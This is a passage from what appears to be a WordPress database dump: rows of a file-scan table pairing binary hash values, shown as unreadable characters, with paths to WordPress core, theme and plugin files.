��d3MU��O��)�','gcK�2d3��n�I�W\\C_0�bmݲ��j&!��U','',0,'?'),('��\Zv�v\\3$��{�x�','wp-content/themes/nirvana/admin/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�حR��K�\\MbPy�','ߊRcq8[9���\r$�̨G�_�\Z���!�^�','',0,'?'),('���P)\rP#){��5bS','wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.flip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�O��+�3c\'8�݉�','�\\_��66kQWI��`��	%�����Q���I��V','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O\rX:7�Y�`','ܣ��C1�d��fq��4(���}���_���L9�3','',0,'?'),('����90)H���$�:','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extension-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���t�VF�\0���X','�ZL4�c�����]#�\"�I�Y{I��,�.-','',0,'?'),('��7Y��1�rOk�r','wp-content/themes/mh-magazine-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}T����,y2A%PM�','�\r��p�����ƒh*�\"`=��\Z�\nn<�ژf','',0,'?'),('����ud�N8(��G','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/options.php',0,'�84l�V�)]1L�-ڒ�','�84l�V�)]1L�-ڒ�','�硬Kp\\|d���i�Kg\"�_��?�eU�','',0,'?'),('��x��\'�*+��wn��','wp-content/themes/hueman/parts/post-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�㾔S��c@\"��L��','AhK�|)<5|�M�f��8{ju(���5�Y','',0,'?'),('�ϊ�S?<I�3ŤN�\"','wp-content/themes/travelify/languages/hu_HU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kyAoi�UX6��z�S~\\','�O[�X�\"�$�. �>L;��^�@65�r�g��','',0,'?'),('��:�v~]Ay$���','wp-content/themes/alpha-store/lib/cmb_extension/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EqJ��\"l�T���D,','�VB5���фȈ��P�؟a�nhg���!Ş\rT','',0,'?'),('��D�X1��[]+:A��','wp-content/themes/twentyseventeen/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�汀Xfp(�<\Zb��B','�8{dZ�Y\ri���n���wN�x�/G���','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[DW\01f�!�`ߜ�','����Ld+,\rO�V���UNxea9̽�+O�C1�','',0,'?'),('���\0��bp\"Ο�7�','wp-content/themes/morfeu/assets/js/libs/jquery.fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����.)�y� ����','��IWnP��E�L��h,p�dJ�sb�/�����hc','',0,'?'),('��\n�G��q���\"��','wp-content/plugins/unyson/framework/static/js/backend-options.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���-���O���','K�}��m/��jc[�۩�������eQʌS:','',0,'?'),('��KI�x��7v�A��','wp-content/themes/supernews/assets/library/respond/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�v|�����ב\'�','�i�CPE#�l�f��H��H�0�sքXk','',0,'?'),('�	Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V���m�?O����','�����b�V���*Oy��.��^�1��Vz','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IQ�[�\r�΋�\n�d','Ad�d�:�;�pk|#��_�mA�{z6�X�f�D,','',0,'?'),('�)��]��D���@w','wp-content/themes/twentyseventeen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6P#�=�j�\r/','��Fq��D�����Z�q�	����*��y���','',0,'?'),('�4S�Q�~�.��','wp-content/themes/alpha-store/lib/welcome/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?���\n2�/�','���֦uKY9t]R�u��#�w���w��bX�','',0,'?'),('�4ʲZ�Qu�e�̘','wp-content/themes/supernews/assets/img/no-image-240-172.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(1�\Z��3\n��9i��','��M}��)�u/�^�Uw�&��Wc��d','',0,'?'),('�5����ܟ��5��fi','wp-content/themes/alpha-store/sidebar-home-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�(���.ƨI�^<8','l�F��N���\'/�6H��5SbX���W�@�','',0,'?'),('�5�}O�Ɖ��z\n�A�','wp-content/plugins/spam-captcha/core/lang/SL_framework-uk_UA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^���{Ԫ���','�\Z���N�B��`��7M�4�\"ܿ^�C�>/','',0,'?'),('�9m�]�7DЎy*�lU','wp-content/themes/the-minimal/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�̨�!�[�ᅲ|[','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('�<�՛/<ep���','wp-content/plugins/unyson/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߁	\'�Y�%���\0M','�U�p:�/Z�nM�6m��<�Հ��-݄!�2R','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�S���U1�7�\r^�','wp-content/plugins/unyson/framework/extensions/breadcrumbs/helpers.php',0,'MO��`I�H�\"G�','MO��`I�H�\"G�','p��o�W��!��f;����1p�\\>Qł�k+�','',0,'?'),('�[��1U	;�ӷHS؊','wp-content/themes/supernews/assets/library/SlickNav/jquery.slicknav.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꖋі�r�ײ��D','�����#��v�o$�Eq#8�5���YƂ','',0,'?'),('�l~U����2~�xr*','wp-content/plugins/spam-captcha/core/lang/SL_framework-he_IL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�^z�!�p��1����','�a����d�G�Ǥ�ʍA��J?�3a�0��','',0,'?'),('�u\Z��I�,l��\na','wp-content/themes/lightly/js/vendor/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̼ټj�+�M�>\\�','�4V�x�\\A-����٢\n�2��b*��D�-','',0,'?'),('�v��O蒗v�����','wp-content/themes/sg-window/img/icons/tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�Y��v$ |�r�E','6��\0(�N)g�\"���5���)ՀL�ߗ','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R���ݯ6��','z�O҈|�AL?�n�X>��lKt:%��6','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('��=�#޸���)��','wp-content/themes/lightly/js/vendor/jquery.fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gUAP��ՙ���y \'','�,��Q�)�����[\n�\n�I��\n��n���8��','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>(K5ѕS���f�I��','����F�u(ć�$���6�ø�G�b�Hg�','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rJn��Ptb\'��z��','n�dE�@Q�t�{�7K�oΐ�޶__Z�ʼ','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('��g�{,�!�HAwi�	�','wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/css/images-only.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�i#Jh��b�O�\0��','�~�18������$Sr\Z����>Ì�w�','',0,'?'),('�����.�$����2t�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ru.js',0,'�b�gYs�u#;A�]','�b�gYs�u#;A�]','gA䒏>�G>+\'�����A�PszP���y��','',0,'?'),('��\n�ӛIQED	��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Рg����3�9���','6I,=��2�����4�Q+�;]��K��	f�px]�','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��x̄�	4U�	k!C','.�йh�dBiHɀ�n�s����᝗�\\���O','',0,'?'),('��nξ8n��Pp\\`z','wp-content/themes/twentytwentyone/assets/css/ie-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4����+\Z�`','?,��şGЅ#�����>-���Q���:�','',0,'?'),('��i���y�4Dm','wp-content/themes/wen-business/inc/hook/footer.php',0,'�>\r��-�[-{\r�<','�>\r��-�[-{\r�<','Q�D����zyάv��s\0%��x���%�A0','',0,'?'),('��\\�v��`22	','wp-content/themes/accelerate/inc/admin/images/no-sidebar-content-centered-layout.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0$X�C�ؕ�N�X�\\','�ex`1�5`��;�$��9����蔡�>1-v','',0,'?'),('�؏�V� �c���:�','wp-content/themes/mh-magazine-lite/images/placeholder-medium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��C�T\\����','���:nv�q\r�_g����x@X;ޅ�P��_D`�','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�6���v���|���','���w�ϔ�\Zԇ%|�H�0�k|��n�','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��`j���D��.�I','wp-content/themes/sg-window/img/icons/small/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڌ\0�U��aY�h4N̖�','9���}+�@\r�ȹz�cP-�R��z!�A@�X�','',0,'?'),('�����-zW#�M��~�m','wp-content/themes/alpha-store/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�(�y/�\\>m�Yf�','�C~�\Z-��h��ḱ3Cz�?y�%�~�\"]2','',0,'?'),('��bS�h��s��W\n�0�','wp-content/plugins/unyson/framework/includes/option-types/upload/static/js/any-files.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L5�Ө��\'{^u�$��','���;��f��ܹDZ1-��i��?3~J�����','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iλj�Q/q$٬K���','�a	�B $���\"+����A.���\"���','',0,'?'),('��tj��-R��O','wp-content/themes/twentyseventeen/assets/images/svg-icons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s[fx_cn_ȥx','�<1P\r�!|���F	a�ZA��L����V�0>�','',0,'?'),('�3���EnI2���','wp-content/themes/fluida/resources/images/headers/window.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w;e^x��S��s�}>�','���i@GL���<��	��E�4���߯�\r-U','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�\n�A����{TH�','wp-content/themes/illdy/sections/front-page-latest-news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`}�����Id_)',',ׂZ=FI`���\Z�y��r��i�{*h��:_','',0,'?'),('�\"��4{��1E�&m','wp-content/themes/accelerate/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�q�	�D��hQ*x(�H','T@Zh��K�G�_H��y8���l��m�g����2','',0,'?'),('�\'_n4�:6y�j�ǔp','wp-content/themes/accelerate/languages/hu_HU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�M� ������','�s@� ��O������{\ni]��nq5J��^','',0,'?'),('�1�ڶc�\rRN�X�Y','wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/image-picker/image-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˶~d�㿁��s�N��','��U��>�襲�\'��ҞP�ܽ�&}�B�h�#�','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V���	�9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�G�\nV�F��B�7�','wp-content/plugins/unyson/framework/extensions/builder/config.php',0,'	��0gå�#�	Wn+X','	��0gå�#�	Wn+X','	[L���w��Q`v��CT����I��+\0','',0,'?'),('�K���e��AO���\'��','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��\r�KLc��(<��bJ','��\r��i�+�Lf�Z�U�.�&��0�������','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('�T�:\Z����rD�� ','wp-content/themes/twentynineteen/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�#�gX��d��X՟��','	�\"`f}����[�8r~A�L!��\\Q','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('�W𓃚�F��GjU�Z','wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\n��+5�����4�','\\Λ;3X]��3��{{8�ҒZ\0�>��\\�&�','',0,'?'),('�a&Qm���g.�C@�','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1��EH�j[��z��','��Fl���F��S�Z��J{7u}C�}���','',0,'?'),('�o���/���75�L��','wp-content/plugins/spam-captcha/core.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����uH5D��A�h��','���pb�l\ni�L�C}��fG�r���Ϲ�b��','',0,'?'),('�t���&�.^`�}�','wp-content/themes/fabulous-fluid/js/jcf.textarea.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k\0��,�\0g/і','I���!���~�V��Gދ�\n�!հv�ZC��','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ل˥��l��)G\r��y','%�`N�u�6���d.�L�!%��q���Ɵ�jp','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3S��-!@|��[�M','���s�n�����U������Bo3�}��+�+','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BJb5��|㮹�ؕ�','���)���w�n�T���������Q�I\'','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('���+ŐP]�Iԯ','wp-content/themes/fluida/resources/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.c��� ��1��7�','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('��Tk���y.$�_��#','wp-content/plugins/unyson/framework/extensions/breadcrumbs/static.php',0,'�W#d�����G','�W#d�����G','[�N>����@����n\"�k��x��\"Yv{�','',0,'?'),('��O�r)e�����I�\Z�','wp-content/plugins/unyson/framework/extensions/backups/includes/module/class--fw-ext-backups-module.php',0,'H�u\r��pN�][a�5','H�u\r��pN�][a�5','�q]&.=���_��[5��\'S��P��5���','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('��r�^��-w�N���','wp-content/themes/hueman/assets/front/img/demo/7-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�ng/�8Z|m����','�ȣ�	.�1V�r��p�^ݞ9��?rf~$��ѷa','',0,'?'),('����m��{�@�m�','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLFʒ4��i�--','���Cc#1_��|��Z  ��1��ɾ���Yx�','',0,'?'),('��3��O�H\n^p�c��','wp-content/themes/the-minimal/images/no-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BՌj���4���','q1�\"��\n��p��]ƛ9��1�\Z��T','',0,'?'),('��v��:d/���4q�','wp-content/themes/hueman/option-tree/assets/fonts/option-tree-font.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ŧم�� �_ʹ','��p�T�1��}7Ҭm%u�TR�(��7&�U','',0,'?'),('����C��\\5\'�','wp-content/themes/nirvana/admin/images/nirvana-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[D�t7}w��]��*�','�K3���.u*E5��A�4�t�3�;���_','',0,'?'),('��o�2#\\.�O��C�','wp-content/themes/accelerate/css/admin/message.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bgH2s����{f','��Ԣ�I�˦�Q��m4�Y�R���X^��C','',0,'?'),('��ֻ�RN���:�R','wp-content/themes/travelify/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ᓗvN����','�L��-,	��)E�8oH�!ߔԦ��)!ҵ1�%','',0,'?'),('�\n%��R(.W��2','wp-content/themes/point/functions/widget-ad300.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������|�#ۖ�','�ɛ�N�����P7P�dL�%��!x','',0,'?'),('�\n�\"Y|�v���oE��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',0,'Q9�U�\\V�א�H�Mr','Q9�U�\\V�א�H�Mr','�0v&0���>ӈ$���`d9�o���90X�!��I','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8K���f&<��)h��','����8�y ���\'���3����SE�o��GZ','',0,'?'),('���o��W��gzz\n','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/static/js/scripts.js',0,'���_��eJR��','���_��eJR��','F��X���P�xAOĭ���5�;�����','',0,'?'),('�%+�:�w�P\"�y�h','wp-content/plugins/wordpress-seo/admin/views/form/select.php',0,'/�*(���A7{�%a','/�*(���A7{�%a','X8��Uc\"�@u���!�?�j��^iq0]x��','',0,'?'),('�+���Y�n�&���','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-unzip.php',0,'����lѾW����','����lѾW����','�]Jd�����uho�y~�\nv��޻�gjϴ	�','',0,'?'),('�7��_�Jh���a\\�','wp-content/themes/hueman/languages/es_VE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�?�f�8݇�>P{','�~���\"M���*n�V\\�� ק�Kq�ʓ`Ǖi','',0,'?'),('�I��=���{\n��W','wp-content/themes/travelify/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���nԙ�\n� �BBmo',';U��h�Y������0Y��\"$�,�WH','',0,'?'),('�M}>����n6����','wp-content/themes/mh-magazine-lite/languages/nb_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8@������7a8�� ','Ȯ�\"g#�����g���1��	��ܥ\Z5�-�','',0,'?'),('�VXg!xOI����{�A','wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php',0,'^^�7|a:�Ț��.�','^^�7|a:�Ț��.�','�xF4�\r�C{L_�Vw�\Z��Z�s\"�Hc|��=�\\','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�qy��ubGZ<��','E�	�U�����A��؜X#˵.9d��s','',0,'?'),('���{�Q��r�Y�','wp-content/plugins/wordpress-seo/admin/class-social-facebook.php',0,'�D��6V����g۝�','�D��6V����g۝�','��ph��,0\\@�۔�[�A�9���b��','',0,'?'),('����s��|���','wp-content/themes/supernews/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�RrZvAɚ�t�}A~','����=��� 7,¦���B]9,�$^U��','',0,'?'),('��գ���t��_','wp-content/themes/the-minimal/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{S.ժ�','dS��t��{�޶�=���ͭ��58})#:�w','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&L�g=�%cn�	}ǣ�','(��`���ĺ�E�ϙ)#��I�jHߠ�&�{','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('���\nZ8\0�g�fA4�','wp-content/themes/relia/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�N�Q�5��X2tr','����N��a��W��[\r����K�F�','',0,'?'),('��yG^F���2�$ �','wp-content/themes/fluida/admin/images/image-style-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�+�X|:��&�*�','���&�瀟S�Z�I�����4ï�M�~���','',0,'?'),('�����z(�d�\'dIt�\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',0,'P>tG\rQ�\0x����','P>tG\rQ�\0x����','�����7�w����\'����ͧu|��/\n','',0,'?'),('����xyO�MQ��,','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/is.js',0,'��3��_��{쾁��W','��3��_��{쾁��W','�����u3�\r��z�Wƣ�=)�k��� <','',0,'?'),('��Շx�^\nzG�w�i�s','wp-content/themes/vega/assets/js/vega-wp-anim.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɛLOd��zL^�{�','��rs6��8s�^���ѝo�@����8|�$�th','',0,'?'),('�М��Kq�j#ۿ��','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fa.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܤVPxe�Cg�.�B�','7�Ts�eaM-!mU��})����P�8z���S','',0,'?'),('��[	i��1Dd I�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ja.js',0,'�>B���wH��/��/','�>B���wH��/��/','�����`9n����\0�-���ڱsy�+�����','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�ݥ��!��YG�w','!�r�|�n�M�-��Yn6X�p����ʖ','',0,'?'),('���GS9KK\"�?\'�','wp-content/themes/vega/sample/images/featured-image-7.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qdXٖz��\n#�	\"��','��̟&:��Y瓲n�md�������5m7�l��','',0,'?'),('�$��Ld�N�B��1','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',0,'��\"�B.�_��p�\\','��\"�B.�_��p�\\','8I�O����2��#����B�V�9�,?��JX�Q','',0,'?'),('��^|J�ʕ\Z%��\"b�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i^e�]�M���@','�~\nf)��Z�����?\"z�I�\\�N乍��','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�y�n��k�`��G','��i�Z�d�D0�.ȍz�����\n�F0�z���','',0,'?'),('���N�O��T�)EH','wp-content/plugins/contact-form-7/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E*�k���S�Nw�','����_.�LL%�\"P\nS�Rm�{�-lPF','',0,'?'),('���*��������}�','wp-content/themes/fluida/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|������R�C�|;y','<N��Ly�)�`�jQV\Z3��q~*��R}','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~�	��','',0,'?'),('���5 �M�t�M��2 ','wp-content/plugins/wordpress-seo/js/dist/wp-seo-recalculate-350.min.js',0,'i{��L�+��I��m','i{��L�+��I��m','���h�(��i�f�#^+��M�7�b9�9� ��','',0,'?'),('���������ͻ�(K�','wp-content/themes/supernews/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!����:�!�C�o��','�vו�ʇ!���I��M\'�荫\"����13QT','',0,'?'),('�\0Or`d,�����m','wp-content/themes/hueman/assets/front/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4j�8����G���%','����MG�å����������J��(K}��','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('�\n�V/�?�p~?��','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ݱc����$�5','�\Z��D���\n䊁QH] \Z���3���(��o*a�','',0,'?'),('�+k�M�h�͉�W�','wp-content/themes/illdy/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�dG��c��_��','�����&e�q)L	